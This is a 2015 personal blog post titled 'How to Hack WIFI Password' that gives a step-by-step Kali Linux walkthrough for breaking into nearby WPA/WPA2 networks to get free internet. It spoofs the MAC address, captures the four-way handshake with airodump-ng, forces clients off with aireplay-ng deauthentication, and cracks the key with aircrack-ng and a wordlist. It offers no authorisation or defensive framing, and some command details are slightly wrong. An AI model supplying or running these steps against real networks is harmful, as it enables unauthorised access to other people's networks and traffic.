Kartier Pohs

Saturday, June 20, 2015

How to Hack WIFI Password.

How to Hack WIFI Password in 2 Minutes
The process of Hacking WiFi  is not really a difficult task. A person who know  to operate the computer can hack/crack the wifi within few hours.
Most Probably you asked yourself some time : " how to hack wifi password ? " Well , you can easily hack wifi password and can enjoy free internet connection.

Due to its impressive benefits many people decide to use a WiFi.

1) Access

2) Cost 

3) Mobility

4) Productivity

5) Distribution

  • Connect to any WiFi network that is in your area, free of charge
  • Enjoy free internet on the go or at your home
  • No more fees for using WiFi
  • Be constantly connected to the internet

Important Terminology:

MAC Address(Media Access Control Address) is a unique  identifier assigned to network interfaces for communications on the  physical network segment.

WAP(Wireless Access Point) is a device that allows wireless devices to connect to a wired network using Wi-Fi

BSSID(Basic Service Set Identification) is the MAC address of the WAP

ESSID(Extended Service Set Identification) is the display name of the wireless network

WPA/WPA2(Wi-Fi Protected Access / Wi-Fi Protected Access  II) are two security protocols and security certification programs  developed by the Wi-Fi Alliance to secure wireless computer networks.

PSK(Pre-Shared Key) is the term for the password defined in WPA/WPA2 encrypted networks.

Steps to crack WiFi Password:

STEP 1: Changing Your MAC Address :

  1. In Kali/BT open the terminal.
  2. command : ifconfig
  3. This should list all network adapters on your system including your wireless one which should be named something like: Wlanx { wlan0, wlan1 ....}
  4. Turn off your network card using the command : ifconfig wlan0 down
    Note: change wlan0 to what ever it said in previous command.
  5. command : macchanger -m 00:11:22:33:44:55
    This will change your MAC address of your device temporarily
  6. Turn the device back on : ifconfig wlan0 up

STEP 2: Create a virtual monitoring inteterface.
In order to listen to the signals that wlan0 is handling we will create a virtual interface that will help us to monitor and handle what wlan0 is sending and receiving.
  1. Command : airmon-ng start wlan0
  2. This will create a new monitor interface called mon0

STEP 3 : Start the attack by monitoring the wireless traffic
  1. Command : airodump-ng mon0
    this will list down all active AP and their BSSID and other details. Also below the list you will see the list f computer stations connected to any of these APs.
  2. Note down the BSSID and channel it is using (CH in the output) of the AP you want to hit
  3. Hit Ctrl+c to end the monitoring.

STEP 4: Lock onto the needed AP.
This will target the communication from just the accespoint you want and start writing don't collected information into a file you need to hack.
What we are hoping to capture is the 4way handshake data that the systems use to authenticate, this data can then be used to crack the password used.
  1. Command : airodump-ng --bssid <bssid of AP> -c 4 -w dumpfilename mon0
    The underlined parts need to be changed as per the data you have. dumpfilename can be replaced with anyhting.
  2. This will start monitoring the Accesspoint and showing you the stations connected to it too. You need to write down the BSSID of any one of the stations so that you can trick it to disconnect and reconnect.

STEP 5 :  Capturing Authentication Packets
Note: This will only work if your network card is packet injection compatible else you will have to wait till the the person disconnect and reconnects himself.
  1. Open new terminal and give command :
    aireplay-ng -0 30 -a <BSSID of Station Connected> mon0
    This will send 30 disconnect requests to the computer causing it to try and reconnect to the accesspoint.
  2. If it shows some error or does not seem to work it is probably the issue with the network card and you will need to wait till the user reconnects by himself.
  3. Once the reconnection happens you can see it in the Airmon terminal which is monitoring the packets. A alert should be shown ton the top right corner.
    Hit ctrl+c and exit it. Time to crack the password.

STEP 6: Cracking the password
  1. You need a password list file which can be downloaded from the internet. Just search for "wordlist" or  "password list" you can get files with millions of words and some as big as 1GB to 10Gb. More the words in it the better.
  2. Get and extract the word list file to your home folder.
  3. Run the command :
    aircrack-ng -w wordlist.lst -b <AP BSSID>  dumpfilename*.cap
  4. Replace the underlined with the the right details.

STEP 7: Wait
  1. Wait some time as your computer does the dirty work of cracking the password. You should have the password on your screen soon.

No comments:

Post a Comment

Copyright 2015 @ Yogesh Prasad